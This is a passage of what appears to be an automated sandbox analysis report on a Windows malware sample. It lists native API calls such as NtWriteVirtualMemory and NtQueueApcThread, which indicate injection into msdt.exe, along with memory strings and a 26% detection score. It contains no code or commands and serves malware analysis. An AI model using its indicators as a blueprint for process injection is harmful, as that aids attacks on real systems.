          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929560 NtWriteFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_0192A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_019296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe | Code function: 7_2_01929670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_047699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_04769B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_0476A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D18690 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D187C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D18710 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D185E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D187BC NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D1873A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 13_2_02D185DA NtCreateFile,
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294459774.0000000006490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294190854.0000000006030000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000000.286959339.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348145495.0000000001B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile read: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe:Zone.Identifier